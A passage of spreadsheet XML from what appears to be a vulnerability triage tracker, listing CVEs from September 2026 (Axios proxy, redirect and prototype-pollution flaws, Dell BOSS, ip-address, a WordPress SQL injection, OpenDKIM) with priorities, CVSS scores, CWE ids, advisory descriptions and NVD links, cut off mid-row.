      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, requests</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.13.0 until 1.20.0, Axios HTTP/2 request setup does not consistently apply proxy settings and caller-supplied DNS lookup policy. An HTTPS request uses httpVersion: 2 with explicit config.proxy or environment-derived proxy settings, or relies on caller-supplied config.lookup DNS policy. The HTTP/2 path can connect without the configured proxy behavior or without applying the caller-supplied config.lookup policy before http2.connect(). Requests can bypass the intended proxy route or the caller-supplied DNS resolution policy. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101898</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101907</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, gin</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-601</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.17.0 until 1.20.0, the fetch adapter bypasses the maxRedirects: 0 redirect policy. An Axios request uses the fetch adapter with maxRedirects set to zero and receives a redirect response. The underlying fetch implementation follows the redirect instead of returning the redirect response unchanged. The redirected request can access internal responses or reach state-changing internal endpoints despite redirects being disabled. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101907</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80357</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-1191</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>Dell Boot Optimized Server Storage (BOSS), versions prior to 2.2.13.2038, contains an On-Chip Debug and Test Interface With Improper Access Control vulnerability in the SMCU on 17G BOSS-N1 controllers. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80357</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101900</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-693, CWE-74</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.12.0 until 1.20.0, ResolveConfig reads inherited Symbol.toStringTag, append, and getHeaders properties while resolving FormData headers. A separate same-process prototype-pollution flaw supplies an array or non-plain class instance whose inherited properties make it appear FormData-like; plain objects are blocked. The inherited getHeaders function can return attacker-controlled headers that resolveConfig merges into a fetch adapter request. Attacker-controlled headers can alter authorization, cache, metadata-service, or application-specific request behavior. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101900</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101902</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, requests, gin</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 0.27.2 until 0.34.0 and 1.20.0, Axios default-instance requests that omit an explicit method can read an inherited method value from Object.prototype. If another vulnerability in the same process pollutes Object.prototype.method, calls such as axios.request({ url }) and axios({ url }) can send a state-changing HTTP method instead of the expected default GET. Axios does not create the prototype pollution source. This is a read-side gadget in axios request dispatch. This issue is fixed in version 0.34.0 and 1.20.0.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101902</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101904</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, rust</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-74</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.0.0 until 1.20.0, the dispatchRequest function normalizes inherited Object.prototype.headers from a replacement request configuration. A separate same-process prototype-pollution flaw sets Object.prototype.headers, and trusted request interceptors return a new ordinary configuration without an own headers property. After the interceptor chain, dispatchRequest resolves the inherited headers during normalization. Downstream request processing can observe attacker-controlled headers, including authorization-related values. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101904</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101908</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, gin</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.7.0 until 1.20.0, the fetch adapter constructs a Request with sanitized resolvedOptions but then calls fetch with the original fetchOptions. A separate same-process prototype-pollution flaw populates Object.prototype.headers so fetchOptions.headers resolves through inheritance. The inherited fetchOptions.headers value overrides the sanitized Request headers through the second argument to fetch after Request construction. Attacker-controlled request headers can alter authorization, caching, metadata-service access, or application-specific behavior. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101908</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101910</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr">
        <is>
          <t>npm:ip-address</t>
        </is>
      </c>
      <c r="M78" s="5" t="inlineStr">
        <is>
          <t>10.5.1</t>
        </is>
      </c>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. From 10.2.0 until 10.5.1, the Address6 isPrivate classifier in src/ipv6.ts does not recognize the NAT64 local-use range 64:ff9b:1::/48. Applications that combine isPrivate, isLoopback, and isLinkLocal for a trust-boundary decision can treat an internal IPv4 destination encoded through that range as external. Exploitation depends on a server network using an operator-selected NAT64 prefix within the local-use range. A successful bypass can cross the intended network trust boundary. This issue is fixed in version 10.5.1.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101910</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82935</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>aws, node.js</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-1104</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module ships with an end-of-life, unsupported Debian 8 and Node.js runtime v17.0.1 in its production firmware. This exposes the device to publicly known vulnerabilities that will not receive security patches. An attacker could exploit these known flaws to execute arbitrary code, access sensitive data, or cause a denial of service on the device.
Vulnerable components were updated or hardened, if update was not possible in version 3.0.30</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82935</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91154</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Missing Authentication for Critical Function (CWE-306) in the product cache revalidation Server Action (src/app/actions.ts, revalidateProducts) in MarcosCamara01 Ecommerce Template before commit ec97209 allows a remote, unauthenticated attacker to force expiration of the entire storefront product cache at will. The file declares "use server" at file scope, so every exported function compiles into a POST-invokable Server Action; revalidateProducts calls updateTag("products") with no session or role check, unlike the read-only actions in the same file which are safe by construction. Two client components under src/components/admin import the function, which causes its Server Action id to be compiled into a public /_next/static chunk that the application's admin middleware (proxy.ts) does not gate, so any unauthenticated user can extract that id from the public bundle and invoke the action directly. With cacheComponents enabled, the entire storefront (home, categories, product pages, search) is served from "use cache" entries produced by getAllProducts, getCategoryProducts and getProduct, all tagged products with an hours-long cacheLife. Repeated unauthenticated invocation of revalidateProducts keeps that cache permanently cold, forcing every visitor's request to read the full product catalog from Postgres instead of serving from cache, degrading storefront availability at near-zero attacker cost.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91154</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102247</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in FastAdmin 1.6.1.20250430/1.6.5.20260602. This affects an unknown function of the file application/database.php of the component Database Management. The manipulation results in execution with unnecessary privileges. The attack may be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102247</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80359</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-1191</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>Dell Boot Optimized Server Storage (BOSS), versions prior to 2.2.13.2038, contains an On-Chip Debug and Test Interface With Improper Access Control vulnerability in the SMCU on 17G BOSS-N1 controllers. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80359</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93000</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>The SPS-Suite WordPress plugin through 1.4.0 does not sanitise the search query before using it in a SQL query when its static-page search feature is enabled, allowing unauthenticated attackers to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93000</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101277</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Trusted Domain Project OpenDKIM up to 2.11.0. The impacted element is the function dkim_process_set of the file dkim.c of the component Tag Tokenizer. Performing a manipulation results in use of less trusted source. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101277</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101279</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-190</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
